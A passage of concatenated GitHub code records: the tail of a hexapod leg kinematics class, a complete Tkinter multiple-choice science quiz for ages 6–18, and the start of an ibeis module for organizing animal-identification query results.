math.cos(alpha), d],\n [0, 0, 0, 1]])\n\n def testPosAlpha(self):\n A0 = self.testCreateAi(self.a[0], 0, -self.a[1], 0)\n return A0\n\n def testPosBeta(self):\n A1 = self.testCreateAi(self.lc, math.pi/2, 0, self.motorAngles[0])\n return np.dot(self.testPosAlpha(), A1)\n\n def testPosGamma(self):\n A2 = self.testCreateAi(self.lf, 0, 0, self.motorAngles[1])\n return np.dot(self.testPosBeta(), A2)\n\n def testPosFoot(self):\n A3 = self.testCreateAi(self.lt, 0, 0, self.motorAngles[2])\n return np.dot(self.testPosGamma(), A3)\n","repo_name":"Alex-Edich/Hexapod","sub_path":"LEG/Leg.py","file_name":"Leg.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"7654399250","text":"#ScienceQuiz_v7.py\r\n#Multi-choice science quiz for primary to high-school students (ages 6-18) with 3 levels of difficulties\r\n#Fredy Vesuna, 25/07/2023\r\n\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport random\r\n\r\n\r\nclass ScienceQuiz:\r\n def __init__(self, parent):\r\n#-------------------------------------------------------#\r\n self.options_buttons = []\r\n self.informationframe = None \r\n self.questionsframe = None\r\n self.summaryframe = None\r\n \r\n self.name_value = StringVar()\r\n self.age_value = StringVar()\r\n self.gender_value = StringVar()\r\n self.difficulty_level = StringVar()\r\n\r\n#-------------------------------------------------------#\r\n \r\n#----------------------------------------------------------------- Configuring the Widgets for HomeFrame -------------------------------------------------------------#\r\n self.homeframe = Frame(parent)\r\n self.homeframe.grid(row = 0, column = 0)\r\n\r\n self.headinglabel = Label(self.homeframe, bg = \"dodgerblue\", fg = \"black\", width = 70, padx = 40, pady = 20, text = \"WELCOME TO THE SCIENCE QUIZ 2023\", font = (\"Times New Roman\", \"16\", \"bold\"))\r\n self.headinglabel.grid(columnspan = 5)\r\n\r\n self.descriptionlabel = Label(self.homeframe, fg = \"black\", width = 35, padx = 300, pady = 10, text = \"\"\"\r\n This is an academic quiz for a purpose to gain intellectual knowledge on science. The quiz will be multichoice with\r\n 3 different difficulties (easy, medium and hard). My target users for the quiz are for any ages.\r\n This is because the quiz is appropriate for anyone to access and should be accessible to any age.\r\n The purpose of the science quiz to create an increase in popularity of science.\r\n This is for people who are interested in science and want to challenge their knowledge by completing\r\n a quiz or if who is new to science and want to test their knowledge after studing or learning the science topic.\"\"\", font = (\"Times New Roman\", \"12\"))\r\n self.descriptionlabel.grid (column = 0)\r\n\r\n self.submit = ttk.Button(self.homeframe, text=\"Participate and Enter Your Details!\", command=self.show_information_frame)\r\n self.submit.grid(row=11, column=1)\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n def show_information_frame(self):\r\n#-------------------------------------------------------#\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n\r\n self.options_buttons.clear()\r\n \r\n if self.homeframe:\r\n self.homeframe.grid_forget()\r\n#-------------------------------------------------------#\r\n\r\n#--------------------------------------------------------- Configuring the Widgets for InformationFrame -------------------------------------------------------------# \r\n self.informationframe = Frame(root)\r\n self.informationframe.grid(row=0, column=0)\r\n\r\n self.headinglabel = Label(self.informationframe, bg = \"light green\", fg = \"black\", width = 40, padx = 40, pady = 20, text = \"ENTER YOUR INFORMATION\", font = (\"Times New Roman\", \"16\", \"bold\"))\r\n self.headinglabel.grid(columnspan = 5)\r\n \r\n self.namelabel = Label(self.informationframe, text = \" Enter your first name:\", width = 60, font = (\"Calibri\", \"11\", \"bold\"))\r\n self.namelabel.grid(row = 2, column = 0, sticky = N)\r\n\r\n self.name = StringVar()\r\n self.name.set(\"\")\r\n self.nameentry = ttk.Entry(self.informationframe, textvariable = self.name_value, width = 25)#The text box for the user to enter their name with ttk/\r\n self.nameentry.grid(row = 3, column = 0, sticky = N)\r\n\r\n self.agelabel = Label(self.informationframe, text = \"Enter your age:\", width = 21, font = (\"Calibri\", \"11\", \"bold\"))\r\n self.agelabel.grid(row = 4, column = 0, sticky = N,)\r\n\r\n self.age = StringVar()\r\n self.age.set(\"\")\r\n self.ageentry = ttk.Entry(self.informationframe, width = 25, textvariable = self.age_value)\r\n self.ageentry.grid(row = 5, column = 0, sticky = N)\r\n\r\n self.genderlabel = Label(self.informationframe, text = \"Enter your gender:\", width = 24, font = (\"Calibri\", \"11\", \"bold\"))\r\n self.genderlabel.grid(row = 6, column = 0, sticky = N)\r\n\r\n select_gender = [\"Male\", \"Female\", \"Other\"]\r\n\r\n self.gender = ttk. Combobox (self.informationframe, values = select_gender, width = 22, state = \"readonly\", textvariable=self.gender_value)\r\n self.gender.grid(row = 7, column = 0, sticky = N)\r\n\r\n self.difficultylabel = Label(self.informationframe, text = \"Which difficulty would you like to choose:\", width = 55, padx = 60, pady = 10, font = (\"Times New Roman\", \"16\", \"bold underline\"))\r\n self.difficultylabel.grid(row = 12, column = 0, sticky = N)\r\n\r\n self.difficulty = [\"Easy Quiz\", \"Medium Quiz\", \"Hard Quiz\"]\r\n self.difficulty_level = StringVar()\r\n self.difficulty_level.set(0)\r\n self.difficulty_buttons = []\r\n\r\n \r\n for i in range (len(self.difficulty)):\r\n button = ttk.Radiobutton(self.informationframe, variable = self.difficulty_level, value = i, text = self.difficulty[i], width = \"40\")\r\n self.difficulty_buttons.append(button)\r\n button.grid(row = i+14, column = 0, sticky = N)\r\n\r\n self.submit = ttk.Button(self.informationframe, text=\"Proceed to the Questions!\", command= self.show_questions_frame)\r\n self.submit.grid(row=20, column=0)\r\n\r\n self.back_to_home_button = ttk.Button(self.informationframe, text=\"Back to Home\", command=self.show_home_frame)\r\n self.back_to_home_button.grid(row=21, column=0)\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n \r\n#-------------------------------------------------------- Configuring Method to Check User's Information -------------------------------------------------------------#\r\n def validate_input(self):\r\n name = self.name_value.get().strip()\r\n age = self.age_value.get().strip()\r\n gender = self.gender_value.get()\r\n\r\n if not name:\r\n messagebox.showerror(\"Input Error\", \"Error: Please enter a valid name.\")\r\n return False\r\n\r\n if not name.isalpha():\r\n messagebox.showerror(\"Input Error\", \"Error: Name can only contain letters.\")\r\n return False\r\n\r\n if not age:\r\n messagebox.showerror(\"Input Error\", \"Error: Please enter your age.\")\r\n return False\r\n\r\n try:\r\n age = int(age)\r\n except ValueError:\r\n messagebox.showerror(\"Input Error\", \"Error: Please enter a valid age.\")\r\n return False\r\n\r\n if age < 6 or age > 18:\r\n messagebox.showerror(\"Input Error\", \"Error: You are too young or too old to particpate.\")\r\n quit()\r\n\r\n if not gender:\r\n messagebox.showerror(\"Inputer Error\", \"Error: Please select your gender.\")\r\n return False\r\n \r\n return True\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n#------------------------------------------------------------------- Configuring Method to Show Questions Frame ------------------------------------------------------#\r\n def show_questions_frame(self):\r\n if not self.validate_input():\r\n return\r\n\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n\r\n if self.homeframe:\r\n self.homeframe.grid_forget()\r\n\r\n\r\n self.questionsframe = Frame(root, padx=20, pady =20)\r\n self.index = 0\r\n self.score = 0\r\n self.questionsframe.grid(row=0, column=0)\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n\r\n#--------------------------------------------------------------------- Configuring the Widgets for QuestionFrame ----------------------------------------------------#\r\n self.headinglabel = Label(self.questionsframe, bg = \"lightgrey\", fg = \"green\", width = 50, padx = 40, pady = 20, text = \"SCIENCE QUIZ QUESTIONS\", font = (\"Times New Roman\", \"16\", \"bold\"))\r\n self.headinglabel.grid(row = 0, columnspan = 3)\r\n \r\n#--------------------------------------------------------------------------------------------------------------------\r\n selected_difficulty = int(self.difficulty_level.get())\r\n\r\n question_banks = [\r\n \r\n [\r\n {\r\n \"question\": \"What is the chemical symbol for water?\",\r\n \"options\": [\"H20\", \"CO2\", \"NaC1\", \"02\"],\r\n \"correct_answer\": \"H20\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the name of the table where you can find all the chemcial elements?\",\r\n \"options\": [\"Element Table\", \"Periodic Table\", \"Science Table\", \"Chemical Table\"],\r\n \"correct_answer\": \"Periodic Table\"\r\n },\r\n\r\n {\r\n \"question\": \"What does DNA stand for?\",\r\n \"options\": [\"Digestion nitrogen acid\", \"Deoxyribonucleic acid\", \"Distribution negative acid\", \"Distribution negative arragment\"],\r\n \"correct_answer\": \"Deoxyribonucleic acid\"\r\n },\r\n\r\n {\r\n \"question\": \"What are the 3 states for matter?\",\r\n \"options\": [\"Salt, Lice, Gas\", \"Side, Liquid, Gas\", \"Solid, Liquid, Green\", \"Solid, Liquid, Gas\"],\r\n \"correct_answer\": \"Solid, Liquid, Gas\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the chemcial symbol for hydrogen?\",\r\n \"options\": [\"H\", \"Na\", \"C\", \"He\"],\r\n \"correct_answer\": \"H\"\r\n }, \r\n \r\n ],\r\n \r\n [\r\n {\r\n \"question\": \"What is the largest planet in our solar system?\",\r\n \"options\": [\"Mars\", \"Jupiter\", \"Venus\", \"Saturn\"],\r\n \"correct_answer\": \"Jupiter\"\r\n },\r\n\r\n {\r\n \"question\": \"Who invented the telephone?\",\r\n \"options\": [\"Alexander Graham Bell\", \"Albert Einstein\", \"Charles Darwin\", \"Rosalind Franklin\"],\r\n \"correct_answer\": \"Alexander Graham Bell\"\r\n },\r\n\r\n {\r\n \"question\": \"Which is not a form of carbon?\",\r\n \"options\": [\"Diamond\", \"Graphite\", \"Amorphous Carbon\", \"Ferrite\"],\r\n \"correct_answer\": \"Ferrite\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the lightest elemet in the periodic table?\",\r\n \"options\": [\"Helium\", \"Hydrogen\", \"Carbon\", \"Nitrogen\"],\r\n \"correct_answer\": \"Hydrogen\"\r\n },\r\n\r\n {\r\n \"question\": \"What energy emerges from motion?\",\r\n \"options\": [\"Potential Energy\", \"Electrical Energy\", \"Kinetic Energy\", \"Consistent Energy\"],\r\n \"correct_answer\": \"Kinetic Energy\"\r\n },\r\n \r\n ],\r\n\r\n [\r\n {\r\n \"question\": \"Who proposed the theory of general relativity?\",\r\n \"options\": [\"Albert Einstein\", \"Isaac Newotn\", \"Stephen Hawking\", \"Galileo Galilei\"],\r\n \"correct_answer\": \"Albert Einstein\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the smallest planet in our solar system?\",\r\n \"options\": [\"Saturn\", \"Venus\", \"Mercury\", \"Neptune\"],\r\n \"correct_answer\": \"Mercury\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the chemical symbol for table salt?\",\r\n \"options\": [\"S\", \"NaCl\", \"NH4F\", \"H2O\"],\r\n \"correct_answer\":\"NaCl\"\r\n },\r\n\r\n {\r\n \"question\": \"What is the normal pH level of human blood?\",\r\n \"options\": [\"7.40\", \"5\", \"6.40\", \"2.3\"],\r\n \"correct_answer\":\"7.40\"\r\n },\r\n\r\n {\r\n \"question\": \"Which of the following planet was first discovered by the telescope?\",\r\n \"options\": [\"Uranus\", \"Venus\", \"Jupitar\", \"Saturn\"],\r\n \"correct_answer\":\"Uranus\"\r\n },\r\n \r\n ]\r\n ]\r\n\r\n self.selected_questions = random.sample(question_banks[selected_difficulty], 5)\r\n\r\n self.questions = [q[\"question\"] for q in self.selected_questions]\r\n self.correct_answers =[q[\"correct_answer\"] for q in self.selected_questions]\r\n\r\n self.current_question_var = IntVar()\r\n self.current_question_var.set(1)\r\n\r\n self.question_label = Label(self.questionsframe, text=self.questions[0], font=(\"Times New Roman\", 12), wraplength = 400, justify = \"center\") \r\n self.question_label.grid (row=1, column=0, columnspan=3, padx=10, pady=10)\r\n\r\n self.options_var = StringVar()\r\n self.options_var.set(None)\r\n for i, option in enumerate(self.selected_questions[0][\"options\"]):\r\n rb = Radiobutton(self.questionsframe, text=option, variable=self.options_var, value=option, font=(\"Times New Roman\",10))\r\n rb.grid(row=i+2, column=1, columnspan=1, padx=10, pady=5, sticky=W)\r\n self.options_buttons.append(rb)\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------\r\n self.submit_button = ttk.Button(self.questionsframe, text = \"Submit\", command=self.check_answer)\r\n self.submit_button.grid(row=7, column =0, columnspan=3, pady=10)\r\n\r\n self.feedback_label= Label(self.questionsframe, text = \"\", font=(\"Times New Roman\", 12), wraplength=600, justify=\"center\")\r\n self.feedback_label.grid(row=8, column=0, columnspan=3, padx=10, pady=10)\r\n\r\n self.back_to_information_button = ttk.Button(self.questionsframe, text=\"Back to Information\", command=self.show_information_frame)\r\n self.back_to_information_button.grid(row=8, column=1)\r\n\r\n self.back_to_home_button = ttk.Button(self.questionsframe, text=\"Back to Home\", command=self.show_home_frame)\r\n self.back_to_home_button.grid(row=9, column=1)\r\n#-----------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n#---------------------------------------------------------- Configuring Method to the Check User's Answers -----------------------------------------------------------#\r\n def check_answer(self):\r\n user_answer = self.options_var.get()\r\n current_question_index = self.current_question_var.get() - 1\r\n\r\n if user_answer:\r\n correct_answer = self.correct_answers[current_question_index]\r\n\r\n if user_answer == correct_answer:\r\n self.score += 1\r\n\r\n self.feedback_label.config(text=f\"Your answer is {'correct!' if user_answer == correct_answer else 'incorrect!'}\")\r\n self.feedback_label.grid(row = 8, column = 2)\r\n self.current_question_var.set(current_question_index + 2) # Move to the next question\r\n\r\n \r\n if current_question_index == len(self.questions) - 1:\r\n self.show_summary_frame()\r\n else:\r\n self.show_next_question()\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n#-------------------------------------------------------- Configuring Method for User to Move on to Next Question ----------------------------------------------------#\r\n def show_next_question(self):\r\n current_question_index = self.current_question_var.get() - 1\r\n self.question_label.config(text=self.questions[current_question_index])\r\n\r\n #Destroy the old radio buttons (if any) for the restart\r\n for rb in self.options_buttons:\r\n rb.destroy()\r\n\r\n self.options_buttons.clear()\r\n\r\n\r\n for i, option in enumerate(self.selected_questions[current_question_index][\"options\"]):\r\n rb = Radiobutton(self.questionsframe, text=option, variable=self.options_var, value=option, font=(\"Times New Roman\", 10))\r\n rb.grid(row=i + 2, column=1, columnspan=1, padx=10, pady=5, sticky=W)\r\n self.options_buttons.append(rb)\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n#----------------------------------------------------------- Configuring Widgets for the SummaryFrame ----------------------------------------------------------------#\r\n def show_summary_frame(self):\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n\r\n if self.summaryframe:\r\n self.summaryframe.destroy()\r\n\r\n self.summaryframe = Frame(root, padx=20, pady=20)\r\n self.summaryframe.grid(row=0, column=0)\r\n\r\n summary_page = [\"Name\", \"Age\", \"Gender\", \"Score\"]\r\n self.summaryframe_labels = []\r\n\r\n for i in range(len(summary_page)):\r\n heading = Label(self.summaryframe, text=summary_page[i], anchor=W, width=15, bg=\"lightblue\", font=(\"Arial\", 14, \"bold\"))\r\n self.summaryframe_labels.append(heading)\r\n heading.grid(row=1, column=i, sticky=\"EW\")\r\n\r\n self.summary_name = Label(self.summaryframe, text=self.name_value.get(), bg=\"lightblue\")\r\n self.summary_name.grid(row=3, column=0, sticky=\"EW\")\r\n\r\n self.summary_age = Label(self.summaryframe, text=self.age_value.get(), bg=\"lightblue\")\r\n self.summary_age.grid(row=3, column=1, sticky=\"EW\")\r\n\r\n self.summary_gender = Label(self.summaryframe, text=self.gender_value.get(), bg=\"lightblue\")\r\n self.summary_gender.grid(row=3, column=2, sticky=\"EW\")\r\n\r\n self.summary_score = Label(self.summaryframe, text=str(self.score) + \"/5\", bg=\"lightblue\")\r\n self.summary_score.grid(row=3, column=3, sticky=\"EW\")\r\n\r\n self.restart_button = ttk.Button(self.summaryframe, text=\"Restart Quiz\", command=self.restart_quiz)\r\n self.restart_button.grid(row=4, column=1, padx=5, pady=10)\r\n\r\n self.quit_button = ttk.Button(self.summaryframe, text=\"Quit\", command=self.quit_quiz)\r\n self.quit_button.grid(row=4, column=2, padx=5, pady=10)\r\n\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n\r\n#----------------------------------------------------------- Configuring Method to allow User to Go Back -------------------------------------------------------------#\r\n def show_home_frame(self):\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n if self.homeframe:\r\n self.homeframe.grid(row=0, column=0)\r\n#---------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n\r\n#-------------------------------------------------------- Configuring Methods to allow User to Restart or Quit the Quiz ----------------------------------------------#\r\n\r\n def restart_quiz(self):\r\n if self.summaryframe:\r\n self.summaryframe.destroy()\r\n\r\n # Reset all variables\r\n self.name_value.set(\"\")\r\n self.age_value.set(\"\")\r\n self.gender_value.set(\"\")\r\n self.difficulty_level.set(0)\r\n\r\n # Reset radio button selection\r\n self.difficulty_level.set(None)\r\n \r\n # Destroy questionsframe and informationframe if they exist\r\n if self.questionsframe:\r\n self.questionsframe.destroy()\r\n if self.informationframe:\r\n self.informationframe.destroy()\r\n\r\n # Go back to the homeframe\r\n self.show_home_frame()\r\n\r\n def quit_quiz(self):\r\n root.destroy()\r\n\r\n#--------------------------------------------------------------------------------------------------------------------------------------------------------------------#\r\n\r\n \r\n\r\n#Main routine - This will run the script as the main module and the name of the parent window (root)\r\n#__name__ is a variable defined for each script\r\nif __name__ == \"__main__\":\r\n root = Tk()\r\n #This is the title of my GUI quiz\r\n root.title(\"Science Quiz 2023\")\r\n GUI = ScienceQuiz(root)\r\n root.mainloop()\r\n \r\n","repo_name":"FredyVesuna/3DIP---Fredy-Vesuna","sub_path":"ScienceQuiz_v7.py","file_name":"ScienceQuiz_v7.py","file_ext":"py","file_size_in_byte":21600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19772243957","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDEPRICATE:\n Use TestResult instead\nnot really used\nmost things in here can be depricated\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nimport six\nimport utool as ut # NOQA\nfrom six.moves import zip\nimport numpy as np\nimport utool\nfrom utool import DynStruct\nprint, rrr, profile = utool.inject2(__name__, '[resorg]', DEBUG=False)\n\n\n#\n#\n# OrganizedResult Class\n#---------------------\n\nclass OrganizedResult(DynStruct):\n \"\"\"\n What chips are populated depends on the type of organization\n\n Notes:\n Maintains an organized list of:\n * query annotation indexes\n * their top matching result\n * their score\n * their rank\n \"\"\"\n def __init__(self, orgtype=''):\n super(DynStruct, self).__init__()\n self.orgtype = orgtype\n self.qaids = [] # query annotation indexes\n self.aids = [] # a matching result\n self.scores = [] # the matching score\n self.ranks = [] # the matching rank\n\n def append(self, qaid, aid, rank, score): # , num_fm):\n self.qaids.append(qaid)\n self.aids.append(aid)\n self.scores.append(score)\n self.ranks.append(rank)\n #self.num_matches.append(num_fm)\n\n def freeze(self):\n \"\"\" No more appending \"\"\"\n self.qaids = np.array(self.qaids)\n self.aids = np.array(self.aids)\n self.scores = np.array(self.scores)\n self.ranks = np.array(self.ranks)\n\n def where_ranks_lt(orgres, num):\n \"\"\" get new orgres where all the ranks are less or equal to \"\"\"\n # Remove None ranks\n return _where_ranks_lt(orgres, num)\n\n def iter_sorted(self):\n qaids = np.array(self.qaids)\n aids = np.array(self.aids)\n scores = np.array(self.scores)\n ranks = np.array(self.ranks)\n #\n sortx = ranks.argsort()\n sorted_qaids = qaids[sortx]\n sorted_aids = aids[sortx]\n sorted_scores = scores[sortx]\n sorted_ranks = ranks[sortx]\n return (sorted_qaids, sorted_aids, sorted_scores, sorted_ranks)\n\n def __len__(self):\n num_qcxs = len(self.qaids)\n num_aids = len(self.aids)\n num_scores = len(self.scores)\n num_ranks = len(self.ranks)\n assert num_qcxs == num_aids\n assert num_aids == num_scores\n assert num_scores == num_ranks\n return num_qcxs\n\n def iter(self):\n \"\"\" useful for plotting \"\"\"\n result_iter = zip(self.qaids, self.aids, self.scores, self.ranks)\n for qaid, aid, score, rank in result_iter:\n yield qaid, aid, score, rank\n\n def printme3(self):\n column_list = [self.qaids, self.aids, self.scores, self.ranks]\n column_lbls = ['qaids', 'aids', 'scores', 'ranks']\n header = 'Orgres %s' % (self.orgtype)\n csvstr = utool.make_csv_table(column_list, column_lbls, header, column_type=None)\n print(csvstr)\n\n\ndef _where_ranks_lt(orgres, num):\n \"\"\" get new orgres where all the ranks are less or equal to \"\"\"\n # Remove None ranks\n isvalid = [rank is not None and rank <= num and rank != -1\n for rank in orgres.ranks]\n orgres2 = OrganizedResult(orgres.orgtype + ' < %d' % num)\n orgres2.qaids = utool.filter_items(orgres.qaids, isvalid)\n orgres2.aids = utool.filter_items(orgres.aids, isvalid)\n orgres2.scores = utool.filter_items(orgres.scores, isvalid)\n orgres2.ranks = utool.filter_items(orgres.ranks, isvalid)\n return orgres2\n\n\ndef _sorted_by_score(orgres):\n \"\"\" get new orgres where arrays are sorted by score \"\"\"\n orgres2 = OrganizedResult(orgres.orgtype + ' score-sorted')\n sortx = np.array(orgres.scores).argsort()[::-1]\n orgres2.qaids = np.array(orgres.qaids)[sortx]\n orgres2.aids = np.array(orgres.aids)[sortx]\n orgres2.scores = np.array(orgres.scores)[sortx]\n orgres2.ranks = np.array(orgres.ranks)[sortx]\n return orgres2\n\n\ndef _score_sorted_ranks_lt(orgres, num):\n orgres2 = _where_ranks_lt(orgres, num)\n orgres3 = _sorted_by_score(orgres2)\n return orgres3\n\n\ndef qres2_true_and_false(ibs, qres):\n \"\"\"\n TODO: generic metrics such as columns of fsv or num feature matches\n\n\n Organizes chip-vs-chip results into true positive set and false positive set\n a set is a query, its best match, and a score\n\n Args:\n ibs (IBEISController): ibeis controller object\n qres (QueryResult): object of feature correspondences and scores\n\n Returns:\n tuple: (true_tup, false_tup)\n true_tup (tuple): (true_aids, true_scores, true_ranks)\n false_tup (tuple): (false_aids, false_scores, false_ranks)\n\n CommandLine:\n python -m ibeis.expt.results_organizer --test-qres2_true_and_false\n\n Example:\n >>> # SLOW_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> aid_list = ibs.get_valid_aids()\n >>> cfgdict = dict()\n >>> qaid_list = aid_list[0:1]\n >>> qaid2_qres = ibs._query_chips4(qaid_list, aid_list, cfgdict=cfgdict)\n >>> qres = qaid2_qres[qaid_list[0]]\n >>> (true_tup, false_tup) = qres2_true_and_false(ibs, qres)\n >>> print(true_tup)\n >>> print(false_tup)\n \"\"\"\n # Get top chip indexes and scores\n top_aids = qres.get_top_aids()\n top_score = qres.get_aid_scores(top_aids)\n top_ranks = range(len(top_aids))\n # True Rids / Scores / Ranks\n true_ranks, true_aids = qres.get_gt_ranks(ibs=ibs, return_gtaids=True)\n true_scores = [-1 if rank is None else top_score[rank] for rank in true_ranks]\n # False Rids / Scores / Ranks\n false_ranks = list(set(top_ranks) - set(true_ranks))\n false_aids = [-1 if rank is None else top_aids[rank] for rank in false_ranks]\n false_scores = [-1 if rank is None else top_score[rank] for rank in false_ranks]\n # Construct the true positive tuple\n NEW = True\n if NEW:\n def sort_tup(tup):\n # Sort tup by rank\n (aids, scores, ranks) = tup\n aids = np.array(aids)\n scores = np.array(scores)\n ranks = np.array(ranks)\n sortx = scores.argsort()[::-1]\n sorted_aids = aids[sortx].tolist()\n sorted_scores = scores[sortx].tolist()\n sorted_ranks = ranks[sortx].tolist()\n sorted_tup = (sorted_aids, sorted_scores, sorted_ranks)\n return sorted_tup\n true_tup = sort_tup((true_aids, true_scores, true_ranks))\n false_tup = sort_tup((false_aids, false_scores, false_ranks))\n else:\n true_tup = (true_aids, true_scores, true_ranks)\n false_tup = (false_aids, false_scores, false_ranks)\n # Return tuples\n return true_tup, false_tup\n\n\ndef organize_results(ibs, qaid2_qres):\n \"\"\"\n Sorts query result annotations, score, and ranks.\n\n Returns:\n dict: orgres - contains OrganizedResult object of various types\n\n CommandLine:\n ib\n python dev.py -t scores --db PZ_MTEST --allgt -w --show\n python dev.py -t scores --db PZ_MTEST --allgt -w --show --cfg codename='vsone' fg_on:True --index 0:3\n python dev.py -t scores --db PZ_MTEST --allgt -w --show --cfg fg_on:True\n python dev.py -t scores --db GZ_ALL --allgt -w --show --cfg fg_on:True\n python dev.py -t scores --db GZ_ALL --allgt -w --show\n\n CommandLine:\n python -m ibeis.expt.results_organizer --test-organize_results\n\n Example:\n >>> # SLOW_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> daid_list = ibs.get_valid_aids()\n >>> qaid_list = daid_list[20:60:2]\n >>> cfgdict = dict()\n >>> qaid2_qres = ibs._query_chips4(qaid_list, daid_list, cfgdict=cfgdict)\n >>> orgres = organize_results(ibs, qaid2_qres)\n >>> #orgres['true'].printme3()\n >>> #orgres['false'].printme3()\n >>> orgres['top_true'].printme3()\n >>> orgres['top_false'].printme3()\n >>> orgres['rank0_true'].printme3()\n >>> orgres['rank0_false'].printme3()\n \"\"\"\n print('[results_organizer] organize_results()')\n org_true = OrganizedResult('true')\n org_false = OrganizedResult('false')\n org_top_true = OrganizedResult('top_true') # highest ranked true matches\n org_top_false = OrganizedResult('top_false') # highest ranked false matches\n org_bot_true = OrganizedResult('bot_true')\n org_problem_true = OrganizedResult('problem_true')\n org_problem_false = OrganizedResult('problem_false')\n org_rank0_true = OrganizedResult('rank0_true')\n org_rank0_false = OrganizedResult('rank0_false')\n\n def _organize_result(qres):\n # Use ground truth to sort into true/false\n # * true_tup = (true_aids, true_scores, true_ranks)\n # * false_tup = (false_aids, false_scores, false_ranks)\n true_tup, false_tup = qres2_true_and_false(ibs, qres)\n last_rank = -1\n skipped_ranks = set([])\n #\n # Record: all_true, missed_true, top_true, bot_true\n topx = 0\n for topx, ttup in enumerate(zip(*true_tup)):\n (aid, score, rank) = ttup\n # Record all true results\n org_true.append(qaid, aid, rank, score)\n # Record non-top (a.k.a problem) true results\n if rank is None or last_rank is None or rank - last_rank > 1:\n if rank is not None:\n skipped_ranks.add(rank - 1)\n org_problem_true.append(qaid, aid, rank, score)\n # Record the best results\n if topx == 0:\n org_top_true.append(qaid, aid, rank, score)\n if rank == 0:\n org_rank0_true.append(qaid, aid, rank, score)\n last_rank = rank\n # Record the worse true result\n if topx > 1:\n org_bot_true.append(qaid, aid, rank, score)\n #\n # Record the all_false, false_positive, top_false\n for topx, ftup in enumerate(zip(*false_tup)):\n (aid, score, rank) = ftup\n org_false.append(qaid, aid, rank, score)\n if rank in skipped_ranks:\n org_problem_false.append(qaid, aid, rank, score)\n if topx == 0:\n org_top_false.append(qaid, aid, rank, score)\n if rank == 0:\n org_rank0_false.append(qaid, aid, rank, score)\n\n # -----------------\n # Query result loop\n for qaid, qres in six.iteritems(qaid2_qres):\n if qres is not None:\n _organize_result(qres)\n #print('[rr2] len(org_true) = %r' % len(org_true))\n #print('[rr2] len(org_false) = %r' % len(org_false))\n #print('[rr2] len(org_top_true) = %r' % len(org_top_true))\n #print('[rr2] len(org_top_false) = %r' % len(org_top_false))\n #print('[rr2] len(org_bot_true) = %r' % len(org_bot_true))\n #print('[rr2] len(org_problem_true) = %r' % len(org_problem_true))\n #print('[rr2] len(org_problem_false) = %r' % len(org_problem_false))\n # qaid arrays for ttbttf\n allorg = dict([\n ('true', org_true),\n ('false', org_false),\n ('top_true', org_top_true),\n ('top_false', org_top_false),\n ('bot_true', org_bot_true),\n ('problem_true', org_problem_true),\n ('problem_false', org_problem_false),\n ('rank0_true', org_rank0_true),\n ('rank0_false', org_rank0_false),\n ])\n\n for org in six.itervalues(allorg):\n org.freeze()\n return allorg\n\n\n@profile\ndef get_automatch_candidates(cm_list, ranks_lt=5, directed=True,\n name_scoring=False, ibs=None, filter_reviewed=False,\n filter_duplicate_namepair_matches=False):\n \"\"\"\n THIS IS PROBABLY ONE OF THE ONLY THINGS IN THIS FILE THAT SHOULD NOT BE\n DEPRICATED\n\n Returns a list of matches that should be inspected\n This function is more lightweight than orgres or allres.\n Used in inspect_gui and interact_qres2\n\n Args:\n qaid2_qres (dict): mapping from query annotaiton id to query result object\n ranks_lt (int): put all ranks less than this number into the graph\n directed (bool):\n\n Returns:\n tuple: candidate_matches = (qaid_arr, daid_arr, score_arr, rank_arr)\n\n CommandLine:\n python -m ibeis.expt.results_organizer --test-get_automatch_candidates:2\n python -m ibeis.expt.results_organizer --test-get_automatch_candidates:0\n\n Example0:\n >>> # ENABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qreq_ = ibeis.main_helpers.testdata_qreq_()\n >>> cm_list = ibs.query_chips(qreq_=qreq_, return_cm=True)\n >>> ranks_lt = 5\n >>> directed = True\n >>> name_scoring = False\n >>> candidate_matches = get_automatch_candidates(cm_list, ranks_lt, directed, ibs=ibs)\n >>> print(candidate_matches)\n\n Example1:\n >>> # UNSTABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qaid_list = ibs.get_valid_aids()[0:5]\n >>> daid_list = ibs.get_valid_aids()[0:20]\n >>> cm_list = ibs.query_chips(qaid_list, daid_list, return_cm=True)\n >>> ranks_lt = 5\n >>> directed = False\n >>> name_scoring = False\n >>> filter_reviewed = 